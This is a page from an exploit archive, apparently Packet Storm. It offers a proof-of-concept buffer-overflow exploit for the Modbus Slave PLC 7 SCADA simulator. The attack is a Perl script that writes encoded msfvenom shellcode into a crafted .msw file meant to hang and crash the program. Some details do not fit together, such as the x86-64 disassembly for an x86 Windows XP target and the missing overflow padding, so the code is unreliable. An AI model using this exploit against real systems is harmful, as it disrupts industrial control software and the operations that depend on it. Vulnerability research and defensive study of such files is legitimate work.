exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Modbus Slave PLC 7 Buffer Overflow

Modbus Slave PLC 7 Buffer Overflow
Posted Oct 29, 2018
Authored by Kagan Capar

Modbus Slave PLC 7 .msw buffer overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
SHA-256 | 57a316badac549c6e7e7a70dc048a41ecb4bd53fc9c8f1f0f65a53b66610d752

Modbus Slave PLC 7 Buffer Overflow

Change Mirror Download
# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
# Author: Kagan Capar
# Discovery Date: 2018-10-27
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
# Vendor Homepage : https://www.modbustools.com
# Tested Version: 7
# Tested on OS: Windows XP SP3 *ENG
# other version should be affected
# About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!.
# Speed up your PLC programming with this simulating tools. Used for SCADA systems.
# Modbus is a serial communications protocol originally published by Schneider Electric
# Steps to Reproduce: Run the perl exploit script, it will create a new
# file with the name "exploit.msw" and Drag on to "mbslave.exe"
# you will see a loop and crash on software
# Greetz : cwd-onkan-badko-key-akkus

# ! /usr/bin/perl

# Dump of assembler code for function loop:
# 0x0000555555558030 <+0>: mov $0x1e3b563c,%ebx
# 0x0000555555558035 <+5>: fld %st(4)
# 0x0000555555558037 <+7>: fnstenv -0xc(%rsp)
# 0x000055555555803b <+11>: pop %rax
# 0x000055555555803c <+12>: sub %ecx,%ecx
# 0x000055555555803e <+14>: mov $0x1,%cl
# 0x0000555555558040 <+16>: xor %ebx,0x14(%rax)
# 0x0000555555558043 <+19>: add $0x4,%eax
# 0x0000555555558046 <+22>: add 0x10(%rax),%ebx
# 0x0000555555558049 <+25>: fisubs 0xe0d0(%rbx)

# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
# print /x &loop
# $1 = 0x555555558030

open(code, ">exploit.msw");
binmode(code);
$loop =
"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
"\xe0";

print code $loop;
close(code);

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close